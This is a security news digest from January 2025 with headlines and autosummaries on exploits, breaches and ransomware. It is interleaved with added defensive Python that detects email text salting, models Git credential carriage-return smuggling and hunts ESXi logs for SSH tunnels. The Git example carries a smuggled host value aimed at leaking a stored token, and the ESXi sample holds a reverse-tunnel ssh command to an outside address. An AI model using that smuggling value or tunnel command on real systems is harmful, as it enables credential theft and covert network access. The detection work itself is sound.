    Autosummary: To counter such attacks, it's recommended to develop advanced filtering techniques that can detect hidden text salting and content concealment, including detecting the use of CSS properties like "visibility" and "display," and to adopt a visual similarity detection approach (e.g., Pisco) to enhance detection capabilities. "
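
    The filtering advice above amounts to separating the text a recipient sees from the text a scanner sees. The following Python is an added example (not code from the article or from the research it reports) of that split for the two CSS properties the article names: it walks the HTML, tracks inline display:none and visibility:hidden down the element tree, and returns the rendered text, the hidden fragments and the share of characters that are hidden. The sample email body is constructed for the demonstration; CSS in style blocks, class-based rules and other concealment tricks (zero font size, text coloured like the background) are outside what it checks.

```python
"""Detect hidden-text salting in HTML email (added example).

Salting hides filler inside the visible text with CSS so the rendered
message reads cleanly while the raw HTML does not. The parser below
tracks which elements are hidden by an inline display:none or
visibility:hidden declaration and splits the text accordingly.
"""
import re
from html.parser import HTMLParser

# Inline-style declarations that remove an element from what the reader sees.
HIDING_DECLARATIONS = {("display", "none"), ("visibility", "hidden")}

# Elements with no closing tag; they never carry child text.
VOID_ELEMENTS = {"area", "base", "br", "col", "embed", "hr", "img", "input",
                 "link", "meta", "source", "track", "wbr"}


def style_hides(style: str) -> bool:
    """True if an inline style string contains a hiding declaration."""
    for declaration in style.split(";"):
        prop, _, value = declaration.partition(":")
        if (prop.strip().lower(), value.strip().lower()) in HIDING_DECLARATIONS:
            return True
    return False


class SaltSplitter(HTMLParser):
    """Collect text into visible and hidden buckets. A stack of booleans
    records whether each open element is hidden, so children inherit
    hiding from any ancestor."""

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.hidden_stack: list = []
        self.visible_parts: list = []
        self.hidden_parts: list = []

    def handle_starttag(self, tag, attrs):
        if tag in VOID_ELEMENTS:
            return
        inherited = self.hidden_stack[-1] if self.hidden_stack else False
        style = dict(attrs).get("style") or ""
        self.hidden_stack.append(inherited or style_hides(style))

    def handle_startendtag(self, tag, attrs):
        return  # self-closing element: nothing to push, nothing to pop

    def handle_endtag(self, tag):
        if tag not in VOID_ELEMENTS and self.hidden_stack:
            self.hidden_stack.pop()

    def handle_data(self, data):
        if self.hidden_stack and self.hidden_stack[-1]:
            if data.strip():
                self.hidden_parts.append(data.strip())
        else:
            self.visible_parts.append(data)


def analyse(html: str) -> dict:
    """Return the text a reader would see, the hidden fragments, and the
    share of characters that are hidden from the reader."""
    parser = SaltSplitter()
    parser.feed(html)
    parser.close()
    rendered = re.sub(r"\s+", " ", "".join(parser.visible_parts)).strip()
    hidden_chars = sum(len(fragment) for fragment in parser.hidden_parts)
    total = hidden_chars + len(rendered)
    return {
        "rendered": rendered,
        "hidden_fragments": parser.hidden_parts,
        "salt_ratio": round(hidden_chars / total, 3) if total else 0.0,
    }


# Constructed phishing-style body for the demonstration (not a real sample).
SAMPLE_EMAIL = """
<p>Dear cust<span style="display:none">lorem</span>omer, your in<span style="visibility: hidden">ipsum</span>voice is attached.</p>
<div style="display:none"><p>weather report</p><p>quarterly newsletter</p></div>
<p>Open the att<span style="DISPLAY:NONE">zz</span>achment now.</p>
"""

# Constructed clean body with nothing hidden.
SAMPLE_CLEAN = "<p>Dear customer, your invoice is attached.</p>"

if __name__ == "__main__":
    for name, body in (("salted", SAMPLE_EMAIL), ("clean", SAMPLE_CLEAN)):
        print(name, analyse(body))
```

    What threshold on the ratio or fragment count should raise an alert is a local decision; the useful output for a rule is that the rendered text is what a phishing classifier should score, while the hidden fragments are what it must not be distracted by.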


    Hackers exploiting flaws in SimpleHelp RMM to breach networks

    exploits
    2025-01-28 https://www.bleepingcomputer.com/news/security/hackers-exploiting-flaws-in-simplehelp-rmm-to-breach-networks/
    Hackers are believed to be exploiting recently fixed SimpleHelp Remote Monitoring and Management (RMM) software vulnerabilities to gain initial access to target networks. [...] "

    Autosummary: Once inside, the attackers ran cmd.exe commands like "net" and "nltest" to gather intelligence about the system, including a list of user accounts, groups, shared resources, and domain controllers, and to test Active Directory's connectivity. "


    Don’t let these open-source cybersecurity tools slip under your radar

    ciber
    2025-01-27 https://www.helpnetsecurity.com/2025/01/27/open-source-cybersecurity-tools-free/

    This article showcases free, open-source cybersecurity tools that help you identify and address vulnerabilities, detect intrusion, protect websites from cyber attacks, monitor and detect suspicious activities across your network. Am I Isolated: Open-source container security benchmark Am I Isolated is an open-source container security benchmark that probes users’ runtime environments and tests for container isolation. Argus: Open-source information gathering toolkit Argus is an open-source toolkit that simplifies information gathering and reconnaissance. It features a user-friendly … More

    The post Don’t let these open-source cybersecurity tools slip under your radar appeared first on Help Net Security.

    "

    Autosummary: Evilginx: Open-source man-in-the-middle attack framework Evilginx is an open-source man-in-the-middle attack framework designed to phish login credentials and session cookies, enabling attackers to bypass 2FA safeguards. Aranya: Open-source toolkit to accelerate secure by design concepts By leveraging the Aranya toolkit, developers can embed secure by design concepts into their products, enabling high-assurance message delivery, secure data exchange, and access control between applications, machines, and sensors without requiring additional security tools. Neosync: Open-source data anonymization, synthetic data orchestration Neosync is an open-source, developer-centric solution designed to anonymize PII, generate synthetic data, and synchronize environments for improved testing and debugging. "


    MintsLoader Delivers StealC Malware and BOINC in Targeted Cyber Attacks

    exploits
    2025-01-27 https://thehackernews.com/2025/01/mintsloader-delivers-stealc-malware-and.html
    Threat hunters have detailed an ongoing campaign that leverages a malware loader called MintsLoader to distribute secondary payloads such as the StealC information stealer and a legitimate open-source network computing platform called BOINC. "MintsLoader is a PowerShell based malware loader that has been seen delivered via spam emails with a link to Kongtuke/ClickFix pages or a JScript file," "

    Autosummary: "While @Delfin claims to be selling JinxLoaderV2 unchanged, @AstolfoLoader opted to rebrand the malware and modify the stub to C++ (Jinx V3), instead of using the original Go-compiled binary," BlackBerry noted late last year. "


    Colombia backs down on deportation flights after Trump tariffs threat

    latam
    2025-01-27 https://www.bbc.com/news/articles/c20p36e62gyo
    President Gustavo Petro agrees to accept deported migrants after Trump had ordered 25% tariffs on all goods. "

    Autosummary: "Your blockade does not scare me, because Colombia, besides being the country of beauty, is the heart of the world," he said. "


    Co-operate or else: Trump's Colombia face-off is warning to all leaders

    latam
    2025-01-27 https://www.bbc.com/news/articles/cglynrxjyl5o
    But there are risks too - coffee prices could rise and nations may be less willing to stop the flow of migrants north. "

    Autosummary: Petro went on to describe himself as "stubborn" and said that while Trump could try to "carry out a coup" with "economic strength and arrogance" he would, in short, fight back. Trump's pick for deputy Secretary of State, Christopher Landau, has long argued that "working with other countries to stop such migratory flows" must be a "global imperative of US foreign policy". "


    GamaCopy Mimics Gamaredon Tactics in Cyber Espionage Targeting Russian Entities

    industry rusia-ucrania
    2025-01-27 https://thehackernews.com/2025/01/gamacopy-mimics-gamaredon-tactics-in.html
    A previously unknown threat actor has been observed copying the tradecraft associated with the Kremlin-aligned Gamaredon hacking group in its cyber attacks targeting Russian-speaking entities. The campaign has been attributed to a threat cluster dubbed GamaCopy, which is assessed to share overlaps with another hacking group named Core Werewolf, also tracked as Awaken Likho and PseudoGamaredon. "

    Autosummary: "


    ESXi ransomware attacks use SSH tunnels to avoid detection

    exploits ransomware
    2025-01-27 https://securityaffairs.com/173487/cyber-crime/esxi-ransomware-attacks-use-ssh-tunnels-to-avoid-detection.html
    Researchers at cybersecurity firm Sygnia warn that threat actors behind ESXi ransomware attacks target virtualized environments using SSH tunneling to avoid detection. Ransomware groups are exploiting unmonitored ESXi appliances to persist and access corporate networks. They use “living-off-the-land” techniques, leveraging […] "

    Autosummary: The report points to the ESXi log files worth reviewing: the VMware observer daemon log, /var/log/shell.log (ESXi shell activity log), /var/log/hostd.log (host agent log), and /var/log/auth.log (authentication log). The report provided multiple examples of common activities and messages found in ESXi syslog files that might be associated with malicious activity. "


    Clone2Leak attacks exploit Git flaws to steal credentials

    exploits
    2025-01-27 https://www.bleepingcomputer.com/news/security/clone2leak-attacks-exploit-git-flaws-to-steal-credentials/
    A set of three distinct but related attacks, dubbed "Clone2Leak," can leak credentials by exploiting how Git and its credential helpers handle authentication requests. [...] "

    Autosummary: Here is an overview of the three ways the Clone2Leak attack can manifest by exploiting various flaws: Carriage return smuggling (CVE-2025-23040 and CVE-2024-50338) – GitHub Desktop and Git Credential Manager misinterpret carriage return (\r) characters in URLs. "


    UnitedHealth almost doubles victim numbers from massive Change Healthcare data breach

    financial
    2025-01-27 https://www.malwarebytes.com/blog/news/2025/01/unitedhealth-almost-doubles-victim-numbers-from-massive-change-healthcare-data-breach
    UnitedHealth now estimates that 190 million people were affected by the massive Change Healthcare data breach nearly a year ago. "

    Autosummary: Billing, claims, and payment information: Claim numbers, account numbers, billing codes, payment card details, financial and banking information, payments made, and balances due. Health information: Medical record numbers, providers, diagnoses, medicines, test results, images, and details of care and treatment. Health insurance information: Details about primary, secondary, or other health plans/policies, insurance companies, member/group ID numbers, and Medicaid-Medicare-government payor ID numbers. "


    Hacked buses blare out patriotic pro-European anthems in Tbilisi, attack government

    government industry
    2025-01-27 https://www.bitdefender.com/en-us/blog/hotforsecurity/hacked-buses-blare-out-patriotic-pro-european-anthems-in-tbilisi-attack-government
    Residents of Tbilisi, the capital city of Georgia, experienced an unexpected and unusual start to their Friday morning commute. As they boarded their public transport buses, they were greeted by a barrage of sound emanating from the vehicles’ speakers. Read more in my article on the Hot for Security blog. "

    Autosummary: Observers, both independent and internationally recognised, as well as local monitors, concluded that the elections failed to meet the standards of fairness and freedom. "


    GitHub Desktop Vulnerability Risks Credential Leaks via Malicious Remote URLs

    exploits
    2025-01-27 https://thehackernews.com/2025/01/github-desktop-vulnerability-risks.html
    Multiple security vulnerabilities have been disclosed in GitHub Desktop as well as other Git-related projects that, if successfully exploited, could permit an attacker to gain unauthorized access to a user's Git credentials. "Git implements a protocol called Git Credential Protocol to retrieve credentials from the credential helper," GMO Flatt Security researcher Ry0taK, who discovered the flaws "

    Autosummary: The list of identified vulnerabilities is as follows: CVE-2025-23040 (CVSS score: 6.6), maliciously crafted remote URLs could lead to credential leaks in GitHub Desktop; CVE-2024-50338 (CVSS score: 7.4), a carriage-return character in a remote URL allows a malicious repository to leak credentials in Git Credential Manager; CVE-2024-53263 (CVSS score: 8.5) - "
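
    Both this entry and the Clone2Leak item above describe the same mechanism: a carriage return embedded in a remote URL reaches the credential helper inside a protocol value, and a helper that treats a bare \r as a line terminator reads a second host= line that Git never intended to send, then hands back the credential stored for that host. The following Python is an added model of that parsing difference (example code, not from Git, GitHub Desktop or Git Credential Manager, and not a reproduction of any helper's implementation). The serializer models Git's pre-fix behaviour as "reject a newline, pass a carriage return"; the credential store, the token and the request contents are all constructed for the demonstration.

```python
"""Model of carriage-return smuggling in the Git credential protocol.

The protocol is a series of key=value lines terminated by a blank line.
A helper that splits on any line terminator sees one extra 'host=' line
when a '\\r' is hidden inside the host value; a helper that accepts only
'\\n' and refuses control characters does not.
"""
import re
from typing import Callable, Dict, Optional

CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")

# Constructed credential store standing in for a helper's backend.
# The token is a fake placeholder, not a real secret.
FAKE_STORE = {("https", "github.com"): "ghp_FAKE_TOKEN_FOR_DEMO"}


def encode_request(fields: Dict[str, str]) -> str:
    """Serialize a credential request as key=value lines plus a blank
    terminator. Models the pre-fix Git side: a newline in a value is
    rejected, a carriage return is passed through untouched."""
    lines = []
    for key, value in fields.items():
        if "\n" in value:
            raise ValueError("newline in credential value")
        lines.append(f"{key}={value}")
    return "\n".join(lines) + "\n\n"


def parse_lenient(request: str) -> Dict[str, str]:
    """Helper-side parser that treats '\\r', '\\n' and '\\r\\n' alike,
    as a ReadLine()-style reader would. The last occurrence of a key
    wins, so a smuggled host= line overrides the real one."""
    fields: Dict[str, str] = {}
    for line in request.splitlines():
        if line == "":
            break
        key, _, value = line.partition("=")
        fields[key] = value
    return fields


def parse_strict(request: str) -> Dict[str, str]:
    """Hardened parser: '\\n' is the only terminator, any other control
    character in a line is rejected, and duplicate keys are refused."""
    fields: Dict[str, str] = {}
    for line in request.split("\n"):
        if line == "":
            break
        if CONTROL_CHARS.search(line):
            raise ValueError("control character in credential request")
        key, _, value = line.partition("=")
        if not key or key in fields:
            raise ValueError("malformed or duplicate key")
        fields[key] = value
    return fields


def lookup(request: str, parse: Callable[[str], Dict[str, str]],
           store: Dict = FAKE_STORE) -> Optional[str]:
    """What the helper would hand back for a request: the stored secret,
    or None when it refuses the request or holds nothing matching."""
    try:
        fields = parse(request)
    except ValueError:
        return None
    return store.get((fields.get("protocol"), fields.get("host")))


# Constructed requests. The second carries a host value with an embedded
# '\r' followed by a second host= line naming the site whose secret we want.
BENIGN_REQUEST = encode_request(
    {"protocol": "https", "host": "github.com", "path": "org/repo.git"})
SMUGGLED_REQUEST = encode_request(
    {"protocol": "https", "host": "attacker.example\rhost=github.com",
     "path": "org/repo.git"})

if __name__ == "__main__":
    print("lenient helper, smuggled request ->", lookup(SMUGGLED_REQUEST, parse_lenient))
    print("strict helper,  smuggled request ->", lookup(SMUGGLED_REQUEST, parse_strict))
    print("strict helper,  benign request   ->", lookup(BENIGN_REQUEST, parse_strict))
```

    The lenient path returns the stored github.com token for a request whose real host is attacker.example, which is the leak; the strict path refuses the request outright. The lesson carries beyond Git: any line-oriented protocol needs one agreed terminator and a control-character check on both the producer and the consumer, because a mismatch between the two is exactly where smuggling lives.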


    ⚡ THN Weekly Recap: Top Cybersecurity Threats, Tools and Tips [27 January]

    ciber
    2025-01-27 https://thehackernews.com/2025/01/thn-weekly-recap-top-cybersecurity_27.html
    Welcome to your weekly cybersecurity scoop! Ever thought about how the same AI meant to protect our hospitals could also compromise them? This week, we’re breaking down the sophisticated world of AI-driven threats, key updates in regulations, and some urgent vulnerabilities in healthcare tech that need our attention. As we unpack these complex topics, we'll equip you with sharp insights to "

    Autosummary: This week's list includes — CVE-2025-23006 (SonicWall), CVE-2025-20156 (Cisco Meeting Management), CVE-2025-21556 (Oracle Agile Product Lifecycle Management Framework), CVE-2025-0411 (7-Zip), CVE-2025-21613 (go-git), CVE-2024-32444 (RealHomes theme for WordPress), CVE-2024-32555 (Easy Real Estate plugin), CVE-2016-0287 (IBM i Access Client Solutions), CVE-2024-9042 (Kubernetes). Over 100 Flaws in LTE and 5G Implementations — A group of academics has disclosed 119 security vulnerabilities impacting LTE and 5G implementations, Open5GS, Magma, OpenAirInterface, Athonet, SD-Core, NextEPC, srsRAN, that could be exploited by an attacker to disrupt access to service and even gain a foothold into the cellular core network. Active since at least 2019, the group has singled out individuals and entities in China, Taiwan, Hong Kong, South Korea, the United States, and New Zealand. Critical Security Flaws in ABB ASPECT-Enterprise, NEXUS, and MATRIX Products — More than 100 security flaws have been disclosed in ABB ASPECT-Enterprise, NEXUS, and MATRIX series of products that could enable an attacker to disrupt operations or execute remote code. PlushDaemon Linked to Supply Chain Compromise of South Korean VPN Provider — A never-before-seen China-aligned hacking group named PlushDaemon carried out a supply chain attack targeting a South Korean virtual private network (VPN) provider in 2023 to deliver malware known as SlowStepper, a fully-featured backdoor with an extensive set of information gathering features. One of the vulnerabilities exploited by the China-linked Salt Typhoon hacking group for initial access is CVE-2021-26855 (aka ProxyLogon), a nearly four-year-old flaw in Microsoft Exchange Server. "


    Apple fixes this year’s first actively exploited zero-day bug

    exploits
    2025-01-27 https://www.bleepingcomputer.com/news/security/apple-fixes-this-years-first-actively-exploited-zero-day-bug/
    Apple has released security updates to fix this year's first zero-day vulnerability, tagged as actively exploited in attacks targeting iPhone users. [...] "

    Autosummary: "


    EU sanctions Russian GRU hackers for cyberattacks against Estonia

    rusia-ucrania ciber
    2025-01-27 https://www.bleepingcomputer.com/news/security/eu-sanctions-russian-gru-hackers-for-cyberattacks-against-estonia/
    The European Union sanctioned three hackers, part of Unit 29155 of Russia's military intelligence service (GRU), for their involvement in cyberattacks targeting Estonia's government agencies in 2020. [...] "

    Autosummary: "


    Microsoft Teams phishing attack alerts coming to everyone next month

    financial
    2025-01-27 https://www.bleepingcomputer.com/news/security/microsoft-teams-phishing-attack-alerts-coming-to-everyone-next-month/
    Microsoft reminded Microsoft 365 admins that its new brand impersonation protection feature for Teams Chat will be available for all customers by mid-February 2025. [...] "

    Autosummary: "If your organization enables Teams external access, we will check for potential impersonation activity when your user receives a message from an external sender for the first time," Microsoft added. "


    TalkTalk confirms data breach involving a third-party platform

    financial
    2025-01-27 https://securityaffairs.com/173526/cyber-crime/talktalk-confirms-data-breach.html
    UK telecommunications firm TalkTalk confirmed a data breach after a threat actor claimed responsibility for the attack on a cybercrime forum and offered alleged customer data for sale. A threat actor named “b0nd” claimed the […] "

    Autosummary: A threat actor named “b0nd” claimed the theft of data on over 18.8 million TalkTalk subscribers, including names, email addresses, IP addresses, phone numbers, and PINs. "


    DeepSeek halts new signups amid "large-scale" cyberattack

    ciber
    2025-01-27 https://www.bleepingcomputer.com/news/security/deepseek-halts-new-signups-amid-large-scale-cyberattack/
    Chinese AI platform DeepSeek has disabled registrations on its DeepSeek-V3 chat platform due to an ongoing "large-scale" cyberattack targeting its services. [...] "

    Autosummary: KELA's AI Red Team was able to jailbreak the model across a wide range of scenarios, enabling it to generate malicious outputs, such as ransomware development, fabrication of sensitive content, and detailed instructions for creating toxins and explosive devices. "


    Apple fixed the first actively exploited zero-day of 2025

    exploits
    2025-01-27 https://securityaffairs.com/173536/hacking/apple-fixed-the-first-zero-day-vulnerability-of-2025.html
    Apple released security updates to address the first zero-day vulnerability of 2025, tracked as CVE-2025-24085, which is being actively exploited in attacks aimed at iPhone users. The flaw is a privilege escalation issue in the Core Media framework. “A malicious […] "

    Autosummary: The vulnerability impacts iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 7th generation and later, and iPad mini 5th generation and later. "


    Cisco warns of a ClamAV bug with PoC exploit

    exploits
    2025-01-26 https://securityaffairs.com/173446/uncategorized/cisco-fixed-clamav-dos-flaw.html
    Cisco has released security updates to address a ClamAV denial-of-service (DoS) vulnerability tracked as CVE-2025-20128, and the Cisco PSIRT warns that proof-of-concept (PoC) exploit code for the flaw is available. The vulnerability resides in […] "

    Autosummary: Pierluigi Paganini, January 26, 2025. Cisco addressed a ClamAV denial-of-service (DoS) vulnerability, and experts warn of the availability of proof-of-concept (PoC) exploit code. "


    Week in review: 48k Fortinet firewalls open to attack, attackers “vishing” orgs via Microsoft Teams

    financial
    2025-01-26 https://www.helpnetsecurity.com/2025/01/26/week-in-review-48k-fortinet-firewalls-open-to-attack-attackers-vishing-orgs-via-microsoft-teams/

    Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: 48,000+ internet-facing Fortinet firewalls still open to attack Despite last week’s confirmation of and warnings about long-standing exploitation of CVE-2024-55591, a critical vulnerability affecting Fortinet Fortigate firewalls, too many vulnerable devices are still accessible from the Internet and open to attack: over 48,000, according to data from the Shadowserver Foundation. Ransomware attackers are “vishing” organizations via Microsoft Teams The “email … More

    The post Week in review: 48k Fortinet firewalls open to attack, attackers “vishing” orgs via Microsoft Teams appeared first on Help Net Security.

    "

    Autosummary: Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: 48,000+ internet-facing Fortinet firewalls still open to attack Despite last week’s confirmation of and warnings about long-standing exploitation of CVE-2024-55591, a critical vulnerability affecting Fortinet Fortigate firewalls, too many vulnerable devices are still accessible from the Internet and open to attack: over 48,000, according to data from the Shadowserver Foundation. "


    Mexican workers set up tent city to house deportees from US

    government
    2025-01-26 https://www.bbc.com/news/articles/czdlvj32lgdo
    As well as a place to sleep, returning Mexicans will receive food, medicine and help in obtaining documents. "

    Autosummary: As well as protection from the elements, the deportees will receive food, medical care, and assistance in obtaining Mexican identity documents, under a deportee-support programme which President Claudia Sheinbaum's administration calls "Mexico Embraces You". In his first days in office, President Trump signed a directive ordering officials to relaunch efforts to build the border wall with Mexico. Furthermore, another key part of Mr Trump's executive orders includes a policy called "Remain in Mexico" under which immigrants awaiting dates to make their asylum cases in a US immigration court would have to stay in Mexico ahead of those appointments. "


    UnitedHealth now says 190 million impacted by 2024 data breach

    financial
    2025-01-26 https://www.bleepingcomputer.com/news/security/unitedhealth-now-says-190-million-impacted-by-2024-data-breach/
    UnitedHealth has revealed that 190 million Americans had their personal and healthcare data stolen in the Change Healthcare ransomware attack, nearly doubling the previously disclosed figure. [...] "

    Autosummary: This stolen data includes patients' health insurance information, medical records, billing and payment information, and sensitive personal information, such as phone numbers, addresses, and, in some cases, Social Security Numbers and government ID numbers. "


    Ransomware gang uses SSH tunnels for stealthy VMware ESXi access

    exploits
    2025-01-26 https://www.bleepingcomputer.com/news/security/ransomware-gang-uses-ssh-tunnels-for-stealthy-vmware-esxi-access/
    Ransomware actors targeting ESXi bare metal hypervisors are leveraging SSH tunneling to persist on the system while remaining undetected. [...] "

    Autosummary: "
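
    Both this item and the Security Affairs write-up of the same Sygnia research (January 27, above) point at the same hunting source: ESXi's own syslog files, in particular /var/log/shell.log for commands typed in the ESXi shell and /var/log/auth.log for SSH logins. The following Python is an added example of a detector over those two files (example code, not from the Sygnia report). It flags any ssh invocation carrying a forwarding option (-R, -L, -D or -w) and notes when the tunnel's far end is also an address that was just accepted as an SSH login source, the "come in, tunnel back out" pattern. The log lines are constructed approximations of the ESXi formats, and the two regexes should be checked against a real host's logs before the rule is trusted.

```python
"""Hunt ESXi shell and auth logs for SSH tunnel set-up (added example).

The line formats below are constructed approximations of what
/var/log/shell.log and /var/log/auth.log contain on an ESXi host;
verify them against real logs before deploying the regexes.
"""
import re
import shlex
from typing import Dict, List

# Constructed sample lines (not taken from a real host).
SHELL_LOG = """\
2025-01-20T10:15:03Z shell[2098765]: [root]: esxcli vm process list
2025-01-20T10:15:40Z shell[2098765]: [root]: ssh -fN -R 127.0.0.1:8443:10.0.1.25:443 svc@203.0.113.10
2025-01-20T10:16:02Z shell[2098765]: [root]: vim-cmd vmsvc/getallvms
2025-01-20T10:16:30Z shell[2098765]: [root]: ssh root@10.0.0.7 uptime
"""

AUTH_LOG = """\
2025-01-20T09:02:11Z sshd[2090011]: Accepted publickey for root from 10.0.0.5 port 40000 ssh2
2025-01-20T10:14:55Z sshd[2098700]: Accepted password for root from 203.0.113.10 port 51234 ssh2
"""

SHELL_LINE = re.compile(
    r"^(?P<ts>\S+) shell\[\d+\]: \[(?P<user>[^\]]+)\]: (?P<cmd>.+)$")
AUTH_LINE = re.compile(
    r"Accepted (?P<method>\w+) for (?P<user>\S+) from (?P<src>\S+) port \d+")

# ssh options that create a port forward or a tun device: -R, -L, -D, -w.
TUNNEL_OPTS = set("RLDw")


def accepted_logins(auth_log: str) -> Dict[str, List[str]]:
    """Map each accepted-login source address to the users it logged in as."""
    logins: Dict[str, List[str]] = {}
    for line in auth_log.splitlines():
        m = AUTH_LINE.search(line)
        if m:
            logins.setdefault(m["src"], []).append(m["user"])
    return logins


def ssh_tunnel_findings(shell_log: str, auth_log: str) -> List[dict]:
    """One finding per shell command that starts ssh with a forwarding
    option. Each finding records whether the tunnel's far end also shows
    up as a source address in the accepted-login list."""
    logins = accepted_logins(auth_log)
    findings: List[dict] = []
    for line in shell_log.splitlines():
        m = SHELL_LINE.match(line)
        if not m:
            continue
        try:
            argv = shlex.split(m["cmd"])
        except ValueError:
            continue  # unbalanced quotes; not a parsable ssh command line
        if not argv or argv[0] != "ssh":
            continue
        # Collect every single-letter option; bundled forms like -fNR count.
        opts = {c for arg in argv[1:] if arg.startswith("-") for c in arg[1:]}
        forwarding = opts & TUNNEL_OPTS
        if not forwarding:
            continue
        # With no remote command the destination is the last argument;
        # drop an optional user@ prefix. A trailing remote command would
        # fool this, so treat the value as a hint.
        remote = argv[-1].rsplit("@", 1)[-1]
        findings.append({
            "timestamp": m["ts"],
            "user": m["user"],
            "command": m["cmd"],
            "remote": remote,
            "forwarding": sorted(forwarding),
            "login_from_remote": remote in logins,
        })
    return findings


if __name__ == "__main__":
    for finding in ssh_tunnel_findings(SHELL_LOG, AUTH_LOG):
        print(finding)
```

    In production, feed the function the two files rather than the embedded samples and forward findings with login_from_remote set to the top of the queue: an external address that logs in and then becomes the far end of a reverse forward is the exact sequence the research describes. The plain "ssh host command" line in the sample is deliberately left unflagged, since ordinary administration looks like that too.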


    SECURITY AFFAIRS MALWARE NEWSLETTER – ROUND 30

    exploits
    2025-01-26 https://securityaffairs.com/173461/malware/security-affairs-malware-newsletter-round-30.html
    Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape. Gmail For Exfiltration: Malicious npm Packages Target Solana Private Keys and Drain Victims’ Wallets; Threat Bulletin: Weaponized Software Targets Chinese-Speaking Organizations; Mass Campaign of Murdoc Botnet Mirai: A New Variant of Corona Mirai; Sophos MDR […] "

    Autosummary: "


    Change Healthcare data breach exposed the private data of over half the U.S.

    financial
    2025-01-26 https://securityaffairs.com/173467/data-breach/change-healthcare-data-breach-190m-people.html
    The Change Healthcare data breach is worse than initially estimated: approximately 190 million people have been affected. In October 2024, UnitedHealth Group announced that the data breach suffered by Change Healthcare in February 2024 impacted more than 100 million individuals. […] "

    Autosummary: “Our experts are working to address the matter and we are working closely with law enforcement and leading third-party consultants, Mandiant and Palo Alto Network, on this attack against Change Healthcare’s systems.” Compromised data includes names, addresses, dates of birth, phone numbers, driver’s license or state ID numbers, Social Security numbers, diagnosis and treatment information, medical record numbers, billing codes, insurance member IDs, and other types of information. "


    Trump imposes 25% tariffs on Colombia as deported migrant flights denied

    latam
    2025-01-26 https://www.bbc.com/news/articles/cdxny0lnyepo
    It comes after Colombian President Gustavo Petro denied entry on Colombian soil of US military planes carrying deported migrants. "

    Autosummary: "These measures are just the beginning," Trump added, saying his administration would not allow the Colombian government "to violate its legal obligations with regard to the acceptance and return of the criminals they forced into the United States". "


    Participants in the Pwn2Own Automotive 2025 earned $886,250

    industry
    2025-01-25 https://securityaffairs.com/173426/breaking-news/pwn2own-automotive-2025-final-results.html
    The Pwn2Own Automotive 2025 hacking contest has ended, and participants earned $886,250 after demonstrating 49 zero-day flaws. Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) obtained 30.5 Master of Pwn points and won the Master of Pwn title, earning $222,250. […] "

    Autosummary: "With 30.5 points and $222,250 awarded, Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) is our Master of Pwn. #P2OAuto" (Zero Day Initiative, @thezdi, January 24, 2025). On the third day, bug hunters earned $168,000 for exploiting 10 zero-day vulnerabilities. "


    PayPal to pay $2 million settlement over 2022 data breach

    financial
    2025-01-25 https://www.bleepingcomputer.com/news/security/paypal-to-pay-2-million-settlement-over-2022-data-breach/
    New York State has announced a $2,000,000 settlement with PayPal over charges it failed to comply with the state's cybersecurity regulations, leading to a 2022 data breach. [...] "

    Autosummary: "


    Aviat Networks enhances software cybersecurity offering

    ciber
    2025-01-24 https://www.helpnetsecurity.com/2025/01/24/aviat-cybersecurity-products/

    Aviat Networks announced that it has enhanced its Secure Software Development Lifecycle (SSDLC) process and Software Vulnerability Alert (SVA) service designed to strengthen Aviat’s software and firmware development process to comply with latest cybersecurity requirements. With the increasing number of vulnerabilities, threats and attacks, SSDLC and SVA are now seen as essential countermeasures to protect against software security threats for critical communications networks. Aviat’s SSDLC is a structured process to improve cybersecurity for all Aviat … More

    The post Aviat Networks enhances software cybersecurity offering appeared first on Help Net Security.

    "

    Autosummary: "


    CISA Adds Five-Year-Old jQuery XSS Flaw to Exploited Vulnerabilities List

    exploits
    2025-01-24 https://thehackernews.com/2025/01/cisa-adds-five-year-old-jquery-xss-flaw.html
    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added a now-patched security flaw impacting the popular jQuery JavaScript library to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The medium-severity vulnerability is CVE-2020-11023 (CVSS score: 6.1/6.9), a nearly five-year-old cross-site scripting (XSS) bug that could be "

    Autosummary: "


    2025 State of SaaS Backup and Recovery Report

    government
    2025-01-24 https://thehackernews.com/2025/01/insights-from-2025-saas-backup-and-recovery-report.html
    The modern workplace has undergone a seismic transformation over recent years, with hybrid work becoming the norm and businesses rapidly adopting cloud-based Software-as-a-Service (SaaS) applications to facilitate it. SaaS applications like Microsoft 365 and Google Workspace have now become the backbone of business operations, enabling seamless collaboration and productivity. However, this "

    Autosummary: Some organizations also face difficulties with provider selection and feasibility (15%), post-migration management (14%), right-sizing cloud instances (8%), licensing complexities (7%) and managing application dependencies (5%). How organizations are securing backup infrastructure: the majority of organizations report having policies and controls in place to secure access to their backups across key areas, including public cloud (77%), servers or virtual machines (76%), SaaS applications (74%) and endpoints/PCs (73%). The survey reveals distinct pain points for users of Microsoft 365, Google Workspace and Salesforce. Data recovery issues: Google Workspace (23%) and Salesforce (23%) users report the highest rates of difficulty with data recovery, compared to 20% of Microsoft 365 users. Google Workspace users (11%) are most challenged in setting up and managing alerts, surpassing Microsoft 365 (8%) and Salesforce (8%) users. Recovery of SaaS data objects: the most frequently recovered objects are email (20%) and mail contacts (17%), which are restored daily, emphasizing their critical role in communication and business continuity. Diverging SaaS adoption trends between SMBs and enterprises: SMBs favor applications that simplify everyday operations and finance management, such as Google Workspace (38% of SMBs vs. 32% of enterprises). "


    SonicWall warns of a critical CVE-2025-23006 zero-day likely exploited in the wild

    exploits
    2025-01-24 https://securityaffairs.com/173387/security/sonicwall-warns-zero-day-sma-1000-series.html
    SonicWall is warning customers of a critical zero-day vulnerability in its Secure Mobile Access (SMA) 1000 Series appliances, likely exploited in the wild. The flaw, tracked as CVE-2025-23006 (CVSS score of 9.8), is a pre-authentication deserialization of untrusted data issue in the […] "

    Autosummary: Pierluigi Paganini, January 24, 2025. SonicWall warns customers of a critical zero-day vulnerability in SMA 1000 Series appliances, likely exploited in the wild. "


    Microsoft: Outdated Exchange servers fail to auto-mitigate security bugs

    exploits
